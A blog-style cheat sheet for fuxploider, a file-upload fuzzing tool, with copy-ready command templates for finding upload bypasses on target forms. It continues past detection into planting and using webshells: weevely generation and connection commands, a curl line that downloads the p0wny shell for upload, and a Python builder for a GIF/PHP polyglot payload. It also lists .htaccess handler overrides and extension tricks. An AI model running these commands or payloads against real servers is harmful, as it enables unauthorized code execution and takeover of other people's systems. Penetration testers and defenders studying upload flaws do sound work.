TechEarl

fuxploider Cheat Sheet: Every Flag I Actually Use

A field-tested fuxploider reference: target shaping, true/false response detection, extension fuzzing, cookies and headers, proxying, threading, and what to do once a webshell uploads. Grounded in the real argparse surface.

Ishan Karunaratne

[Image: fuxploider command reference cheat sheet covering target shaping, extension fuzzing, detection regex, threading, and post-upload pivots]

fuxploider is a focused tool: it fuzzes a file upload form until it finds an extension the server accepts, then optionally uploads a real payload. The flag surface is small, and the knobs that matter (true/false regex, legitimate-extension list, template payload, cookies) are easy to misuse. This is the field reference for the flags I actually reach for, grouped by what I am trying to do.

Project status. fuxploider's last tagged release was v1.0 in 2018; upstream activity has been thin since. The CLI surface below is the one the current master branch ships, but new file-upload bypass classes (Nginx try_files quirks, IIS semicolon-truncation variants, modern polyglots) are not tracked by the tool. Treat it as a fast first-pass scanner against the well-known bypasses, then move to manual work for the long tail.

If you are new to the tool, the fuxploider tutorial walking through an attack against a vulnerable app is the right next stop. For the underlying classes of bug, the file upload vulnerabilities deep dive covers the taxonomy. If you are comparing options, the best file upload tools list for 2026 covers the alternatives.

Quick reference

fuxploider Command Reference

Every flag organised by task. Copy and adapt. Based on the actual argparse surface in fuxploider.py.

Target specification

-u 'https://target.example/upload.php' (`--url`)
    URL of the page that hosts the upload form. fuxploider fetches it, parses the form, finds the file input, and submits there.

--not-regex 'not allowed|forbidden|invalid'
    Regex matching an upload failure response. Either this or --true-regex is required so the tool can tell pass from fail. Used on its own, every response it does not match counts as a success, so keep it specific to the rejection page.

--true-regex 'upload (successful|complete)'
    Regex matching an upload success response. Inverse of --not-regex. Prefer this when the success page is more stable than the error page.

-d 'csrf=abc&extra=foo' (`--data`)
    Additional POST data sent alongside the file. Use for CSRF tokens or required hidden fields the form ships with.

--cookies 'session=abc; PHPSESSID=xyz'
    Cookies for HTTP requests. Required for any upload form that lives behind a login.

Payload and template files

-t ./payloads/shell.php (`--template`)
    Path to the malicious payload used during the code-execution detection phase. fuxploider uploads it and then checks whether it executed; by default it tries all bundled templates. The bundled ones live under payloads/ and are listed in templates.json there together with their detection regex; if a custom template is not picked up, register it in the same form.

-r 'unique-marker-1337' (`--regex-override`)
    Custom regex used to detect that the uploaded payload executed (typically a token your template prints). Override when the bundled detection logic does not match your custom template. Pick a marker that only exists after execution (concatenate it inside the payload rather than writing it out literally), so a server that serves the raw source back does not trigger a false positive.

-f 10 (`--filesize`)
    Generated file size in kB. Default 10. Useful when the target rejects empty or tiny uploads as suspicious.

--uploads-path '/uploads/'
    Path on the remote server where uploaded files are stored. fuxploider requests the uploaded file from this path to confirm code execution; without it the tool has to guess where the file landed.

Extension detection

-l 'jpg,png,gif' (`--legit-extensions`)
    Comma-separated list of extensions the form legitimately accepts (the image types an avatar form expects, not the PHP extensions you want to execute). fuxploider builds its bypass candidates around this list; supplying it removes the guesswork from the recon phase.

-n 100
    Number of common extensions to try during recon. Default 100. Lower for a fast first pass; raise for a thorough run.

-s (`--skip-recon`)
    Skip the extension discovery phase entirely. Use it when you already know which extensions the form accepts, and pass them with -l so fuxploider still has something to build on.

-y
    Force detection of every entry point without asking any questions. Do not stop at the first working technique, and never prompt: the flag for scripted, non-interactive runs.

Form detection (manual mode)

-m (`--manual-form-detection`)
    Disable automatic form detection. Required when the upload form is JS-generated or sits behind logic fuxploider's parser cannot follow.

--input-name 'file'
    Manual: name of the file input field in the multipart body. Pair with -m.

--form-action '/upload'
    Manual: path of the form's action attribute. Pair with -m; it is ignored when the form is auto-detected. Leave empty to submit to the same URL.

Threading and verbosity

-T 4 (`--threads`)
    Worker thread count. Default 4. Higher speeds the matrix sweep but loses request ordering, which can confuse rate limiters and stateful WAFs.

-v (`--verbose`)
    Verbose. Prints what fuxploider is trying as it goes.

-vv
    Very verbose. Adds intermediate request and response details.

-vvv
    Maximum verbosity. Full request and response per attempt; noisy but invaluable when nothing is matching.

User-Agent

-U 'Mozilla/5.0 ...' (`--user-agent`)
    Custom User-Agent string. Mutually exclusive with --random-user-agent.

--random-user-agent
    Use a random UA per request. Helpful when the target throttles or fingerprints repeated UAs.

Proxy

--proxy '127.0.0.1:8080'
    Proxy in host:port or user:password@host:port form (no scheme). Burp or mitmproxy on the loopback is the usual choice for inspecting the multipart bodies fuxploider builds.

--proxy-creds
    Prompt for proxy credentials at runtime instead of embedding them in --proxy. Cleaner for shared machines and shell histories.

Post-detection pivot

(prompts)
    Once a working extension is found, fuxploider prompts before uploading the template(s) given with -t. Answer yes, or pass -y to skip the prompts in scripted runs.

weevely generate <pass> shell.php
    Generate a stealthy PHP webshell with weevely, then pass it as -t. Connect with `weevely http://target/uploads/shell.php <pass>`.

curl https://.../p0wny.php > shell.php
    p0wny-shell is a single-file PHP shell that renders a terminal UI in the browser. Drop it as the -t template, visit the upload URL, get a shell prompt.

How fuxploider actually decides whether an upload worked

fuxploider does not key on the HTTP status code. It posts the multipart body, reads the response body, and runs the regex you gave it: if --not-regex matches, the attempt is treated as a rejection; if --true-regex matches, it is treated as a success. With --not-regex alone, every response the pattern fails to match counts as a success, including a 500 page or a login redirect. Get the regex wrong and the entire run is meaningless. Two practical rules:

  1. Read the rejection page in a browser before you run fuxploider. Copy the literal phrase the server prints when a bad file is rejected ("File type not allowed", "Sorry, only images", whatever it is). That phrase is your --not-regex. Anchor it tightly enough that a generic 500 page does not also match, and remember that a 500 page it does not match is scored as an upload; if the app throws server errors under fuzzing, switch to --true-regex.
  2. Prefer --true-regex when the success page contains a stable marker (the saved filename, a "view your upload" link). Successes are less ambiguous than failures on apps that surface a dozen different validation errors.
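To make the two rules concrete, here is a small dry-run checker. It is an added example, not code from fuxploider. It applies the labelling described above (failure pattern matches: rejected; success pattern matches: accepted) with Python's re.search, which is an assumption about how fuxploider evaluates the patterns (it is a Python tool, so the re module is what compiles them); how the two patterns combine when both are given is also this example's choice. The three response bodies are constructed samples. The point it shows: with --not-regex alone, a 500 page that the pattern does not match is scored as a successful upload.

```python
import re

# Constructed sample response bodies (not captures from a real target).
SAMPLES = {
    "rejection": '<html><body><div class="error">Sorry, file type not allowed. '
                 'Only jpg/png images are accepted.</div></body></html>',
    "success": '<html><body>Upload successful! '
               '<a href="/uploads/avatar_1337.jpg">view your upload</a></body></html>',
    "server_error": '<html><head><title>500 Internal Server Error</title></head>'
                    '<body>An error occurred while processing your request.</body></html>',
}

# Patterns exactly as you would pass them on the command line (Python re syntax).
NOT_REGEX = r"file type not allowed|only jpg/png"
TRUE_REGEX = r"Upload successful|view your upload"


def classify(body, not_regex=None, true_regex=None):
    """Label one response the way the page describes fuxploider doing it.

    --not-regex match  -> "rejected"
    --true-regex match -> "accepted"
    With --not-regex alone, any body the pattern does not match is "accepted":
    that is how a 500 page becomes a false positive.
    With both patterns (assumed combination), a body matching neither is
    reported as "unknown" rather than guessed.
    """
    if not_regex is None and true_regex is None:
        raise ValueError("supply --not-regex, --true-regex or both")
    if not_regex is not None and re.search(not_regex, body):
        return "rejected"
    if true_regex is not None:
        if re.search(true_regex, body):
            return "accepted"
        return "unknown" if not_regex is not None else "rejected"
    return "accepted"


def vet(not_regex=None, true_regex=None, rejections=(), successes=(), controls=()):
    """Dry-run the patterns against known rejections, known successes and
    control pages (500s, login redirects). Returns a list of problems;
    an empty list is the go signal."""
    problems = []
    for i, body in enumerate(rejections):
        if classify(body, not_regex, true_regex) != "rejected":
            problems.append(f"rejection sample {i} would be read as an upload")
    for i, body in enumerate(successes):
        if classify(body, not_regex, true_regex) != "accepted":
            problems.append(f"success sample {i} would be missed")
    for i, body in enumerate(controls):
        # A control page read as "accepted" sends you chasing a shell that never landed.
        if classify(body, not_regex, true_regex) == "accepted":
            problems.append(f"control page {i} would be read as an upload (false positive)")
    return problems


if __name__ == "__main__":
    rej, ok, err = (SAMPLES[k] for k in ("rejection", "success", "server_error"))
    print("not-regex only :", vet(not_regex=NOT_REGEX, rejections=[rej], successes=[ok], controls=[err]))
    print("true-regex only:", vet(true_regex=TRUE_REGEX, rejections=[rej], successes=[ok], controls=[err]))
```

Save the real rejection, success and error pages from the browser into the dictionary (or read them from files) and run this before the first fuxploider invocation. With the sample pages, the --not-regex-only run reports the 500 page as a false positive and the --true-regex-only run comes back clean, which is rule 2 in one line of output.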

Workflow templates

Starting points I keep around and adapt. The values are the ones used throughout this page (the form at https://target.example/upload.php, a rejection regex of 'not allowed|invalid', -v for progress, -T 4); swap in your own. Raising threads past 4 against a stateful WAF often makes detection unreliable; keep it low until you have ordering under control.

First pass against an unauthenticated upload page. Just a URL and a rejection regex. Good for a sanity check before you bother with cookies or custom payloads:

bash
python3 fuxploider.py -u 'https://target.example/upload.php' --not-regex 'not allowed|invalid' -v -T 4

Authenticated upload, behind a session cookie. Grab the cookie from your browser DevTools first:

bash
python3 fuxploider.py -u 'https://target.example/upload.php' \
         --cookies 'session=PASTE_SESSION_HERE; PHPSESSID=PASTE_PHPSESSID_HERE' \
         --not-regex 'not allowed|invalid' -v -T 4

Tell fuxploider what the form normally accepts. When you already know the legitimate set (an avatar form that takes jpg/png/gif, read off the page or from a previous probe), seed -l with it; the recon phase then has nothing to guess and the bypass candidates are built around those extensions. Add -s once you are sure of the list:

bash
python3 fuxploider.py -u 'https://target.example/upload.php' \
         -l 'jpg,png,gif' -s \
         --not-regex 'not allowed|invalid' -v -T 4

Upload page with more than one form, plus a CSRF token in a hidden field. Use manual form-detection, point --input-name and --form-action at the right form, and pass the token via -d:

bash
python3 fuxploider.py -u 'https://target.example/upload.php' \
         -m --input-name 'file' --form-action '/upload' \
         -d 'csrf_token=PASTE_TOKEN_HERE' \
         --cookies 'session=PASTE_SESSION_HERE' \
         --not-regex 'not allowed|invalid' -v -T 4

Route through Burp to inspect every multipart body fuxploider builds. Run Burp on the default 127.0.0.1:8080, drop the proxy in (no scheme), keep a single thread so the requests arrive in the order they were made, and watch them stream past:

bash
python3 fuxploider.py -u 'https://target.example/upload.php' \
         --proxy '127.0.0.1:8080' \
         --not-regex 'not allowed|invalid' -v -T 1

Custom payload, ready to drop a webshell once an extension passes. Generate the shell first, then point -t at it. A weevely agent prints no fixed marker on a plain GET, so fuxploider will not report code execution for it; the file still lands, so connect with the weevely client regardless (if you want fuxploider's own confirmation first, run once with the bundled templates, then re-run with -t):

bash
weevely generate hunter2 ./payloads/shell.php
python3 fuxploider.py -u 'https://target.example/upload.php' \
           -t ./payloads/shell.php \
           -l 'jpg,png,gif' \
           --not-regex 'not allowed|invalid'

Once fuxploider reports a working combination and the file is on disk, connect:

bash
weevely http://target.example/uploads/shell.php hunter2

If you would rather use a browser-resident shell, p0wny is the one-file option. Drop it as the template (pair it with -r matching a string the shell's page prints if you want fuxploider to confirm execution), visit the uploaded URL, type into the page:

bash
curl -fsSL https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -o ./payloads/p0wny.php
python3 fuxploider.py -u 'https://target.example/upload.php' \
           -t ./payloads/p0wny.php \
           -l 'jpg,png,gif' \
           --not-regex 'not allowed|invalid'

What fuxploider does not do

fuxploider is fast at sweeping the extension matrix. It does not implement every parser-level bypass that ends up working in real engagements. Worth knowing:

  • Apache .phP (and other case-flip) parsing quirks. On older mod_php installs, Apache treats .phP, .Php, and uncommon aliases like .phtm as PHP because the handler is registered case-insensitively. The full case-flip catalogue is in the file upload extension bypass guide. Test the variants by hand in Burp Repeater; do not push them through -l, which is the list of extensions the form legitimately accepts, not a list of payload extensions.
  • .htaccess override uploads. If the target writes uploads to a directory where .htaccess is honoured, uploading a custom .htaccess that adds a handler for an innocuous extension (AddType application/x-httpd-php .jpg) turns every previously-allowed JPEG into PHP. fuxploider does not chain a .htaccess write with a subsequent payload upload.
  • Image polyglots. A JPEG with PHP appended after the image data passes both magic-byte and naive MIME checks, and executes if the server interprets the extension as PHP. fuxploider lets you upload polyglots if you craft them yourself and pass them via -t, but it does not generate them.
  • Content-Type spoofing per multipart part. fuxploider does not expose a flag to set arbitrary Content-Type values per uploaded file; the multipart body uses the type inferred from the template file. The MIME spoofing bypass guide covers the layered bypasses; develop those in Burp Repeater rather than fuxploider.
  • Double-extension nuances on Nginx and IIS. Apache parses shell.php.jpg as PHP only with specific config. Nginx with try_files parses very differently. IIS has its own semicolon-truncation history (shell.asp;.jpg). The double-extension upload bypass guide has the per-server matrix.
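The polyglot bullet above and the -t / -r rows in the quick reference meet in the following added example (mine, not fuxploider's or anyone else's code). It builds a GIF89a-headed file with a PHP stub that prints a marker assembled at run time, so the literal marker exists only in executed output, derives the -r pattern from it, and includes a one-pattern stand-in for the PHP engine to show what the detection phase would see. The file path ./payloads/polyglot.php and the marker text are this example's own choices.

```python
import re
import struct
from pathlib import Path

# The marker the payload prints once PHP runs it. It is assembled from two
# halves inside the PHP code so the literal never appears in the file: a server
# that serves the upload back unexecuted will not contain it, and -r will not
# false-positive on the raw source.
MARKER_LEFT, MARKER_RIGHT = "fxpM", "ARK3R"
MARKER = MARKER_LEFT + MARKER_RIGHT          # what -r should look for


def gif_header(width=1, height=1):
    """Minimal 13-byte GIF89a header: signature, logical screen width/height
    (little-endian), packed flags, background index, pixel aspect ratio.
    Enough for magic-byte checks and getimagesize()-style header parsing."""
    return b"GIF89a" + struct.pack("<HH", width, height) + b"\x00\x00\x00"


def build_polyglot():
    """GIF header followed by the PHP stub. Everything outside <?php ... ?> is
    passed through verbatim by the PHP engine, so the binary prefix is harmless."""
    php = "<?php echo '%s' . '%s'; ?>" % (MARKER_LEFT, MARKER_RIGHT)
    return gif_header() + b"\n" + php.encode("ascii")


def detection_regex():
    """Value for -r / --regex-override: the marker, escaped for Python re."""
    return re.escape(MARKER)


def marker_detected(body):
    """The check the detection phase performs on a fetched upload: does -r match?"""
    return re.search(detection_regex(), body.decode("latin-1")) is not None


def check_template(payload):
    """Properties a usable polyglot template must have before you pass it to -t."""
    return {
        "gif_magic": payload.startswith(b"GIF89a"),
        "has_php_tag": b"<?php" in payload,
        "marker_not_in_source": MARKER.encode() not in payload,
    }


# Stand-in for the PHP engine, valid only for the stub build_polyglot() emits:
# bytes outside the tag pass through, the echo of two string literals is replaced
# by their concatenation.
_ECHO_STUB = re.compile(rb"<\?php echo '([^']*)' \. '([^']*)'; \?>")


def simulate_executed_output(payload):
    """What the server returns for the uploaded file if PHP executed it."""
    return _ECHO_STUB.sub(lambda m: m.group(1) + m.group(2), payload)


def fuxploider_args(template_path="./payloads/polyglot.php"):
    """Flags to add to the run (template path is an assumed location)."""
    return ["-t", template_path, "-r", detection_regex()]


def write_template(path="./payloads/polyglot.php"):
    """Write the polyglot to disk at the path fuxploider_args() points at."""
    target = Path(path)
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_bytes(build_polyglot())
    return target


if __name__ == "__main__":
    data = build_polyglot()
    print(check_template(data))
    print("unexecuted fetch detected:", marker_detected(data))
    print("executed fetch detected:  ", marker_detected(simulate_executed_output(data)))
    print("add to the command line: ", " ".join(fuxploider_args(str(write_template()))))
```

The executed output is the GIF header followed by the marker, so it still starts with image bytes; the only thing -r keys on is the concatenated string that the source never contains. Any template you hand to -t should pass the same three checks, and if the server returns the file with the marker absent, it served the bytes rather than executing them, which is exactly the distinction the detection phase needs.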

If a fuxploider run comes up empty, the next move is rarely "more threads". It is reading the rejection page carefully, then reaching for one of the bypass classes above.

Flags I almost never reach for

  • Raising -T past 4 against any production-adjacent target. The speed gain on a small extension list is not worth the lost request ordering when the target has a rate limiter or a stateful WAF.
  • --random-user-agent once I have already identified a UA the target accepts. The randomisation often pulls a UA that the WAF flags more aggressively than a fixed modern browser string.

A note on responsible use

Every flag above is dual use. The same upload that drops a benign GIF on a CTF lab is the one that drops a webshell on a production app. Use fuxploider against systems you own or are explicitly authorised to test. See the legal framing in the file upload vulnerabilities deep dive.


Ishan Karunaratne

Tech Architect · Software Engineer · AI/DevOps

Tech architect and software engineer with 20+ years building software, Linux systems, and DevOps infrastructure, and lately working AI into the stack. Currently Chief Technology Officer at a healthcare tech startup, which is where most of these field notes come from.
